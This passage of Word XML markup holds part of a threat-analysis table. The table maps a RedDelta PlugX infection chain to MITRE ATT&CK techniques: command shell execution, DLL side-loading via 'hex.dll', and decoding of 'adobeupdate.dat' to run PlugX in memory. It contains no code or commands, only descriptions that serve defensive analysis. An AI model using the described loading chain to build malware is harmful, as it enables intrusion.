                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DBA28DE" w14:textId="76D07875" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007664E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69BED5B1" w14:textId="6B18F990" w:rsidR="00485A81" w:rsidRDefault="00616289" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5918C9AE" w14:textId="77777777" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26FE0502" w14:textId="7388D2C3" w:rsidR="00485A81" w:rsidRDefault="00596BB3" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A12EDAC" w14:textId="18A8A8A3" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00B42656" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0F809D" w14:textId="77777777" w:rsidR="00485A81" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See also above</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C5EF0A" w14:textId="77777777" w:rsidR="00485A81" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DB2619F" w14:textId="3260DECE" w:rsidR="00485A81" w:rsidRPr="007263B6" w:rsidRDefault="001C583E" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00485A81" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">“AAM Updates.exe” is then executed, starting the installation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F57CF1B" w14:textId="77777777" w:rsidR="00485A81" w:rsidRPr="007263B6" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">process by sideloading the malicious “hex.dll.” “Hex.dll” will decode and execute </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B0F715" w14:textId="77777777" w:rsidR="00485A81" w:rsidRPr="007263B6" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">“adobeupdate.dat,” which ultimately leads to the execution of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4334D86B" w14:textId="3E03A3EA" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>variant in memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00704ECD" w:rsidRPr="00B857D7" w14:paraId="60901E9D" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529F23B1" w14:textId="584CD11C" w:rsidR="00704ECD" w:rsidRDefault="00E731E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2914D1" w14:textId="531146FD" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00F63536" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FD7ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="491075C2" w14:textId="32687E17" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1574.002 Hijack Execution Flow: DLL Side-Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17827988" w14:textId="61EE6E9A" w:rsidR="00704ECD" w:rsidRDefault="00616289" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037D1906" w14:textId="77777777" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00704ECD" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71359AA6" w14:textId="13160415" w:rsidR="00704ECD" w:rsidRDefault="00616289" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307AB73C" w14:textId="34842CB4" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/</w:t>
            </w:r>
            <w:r w:rsidR="00B42656">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ED4460C" w14:textId="7AF27E4F" w:rsidR="00704ECD" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00485A81" w:rsidRPr="00B857D7" w14:paraId="1422A3B1" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F476C3D" w14:textId="7380E44A" w:rsidR="00485A81" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E731E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721049BB" w14:textId="19C843E6" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75E98896" w14:textId="32E18B8C" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B29D3DC" w14:textId="07B5BDEC" w:rsidR="00485A81" w:rsidRDefault="00616289" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB17205" w14:textId="77777777" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="686FEE26" w14:textId="26CA1545" w:rsidR="00485A81" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29101AD2" w14:textId="78AAB096" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00992EC7" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E1BD28" w14:textId="348B8718" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090306D" w:rsidRPr="00ED5880" w14:paraId="3C6140B8" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="013F395A" w14:textId="7BA77264" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E731E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7187D4AF" w14:textId="52BC3228" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F7371D" w14:textId="18DD19FA" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007664E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="610A0403" w14:textId="0D661973" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="00616289" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00616289">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5848D4F0" w14:textId="77777777" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D1DD09A" w14:textId="56A0D806" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
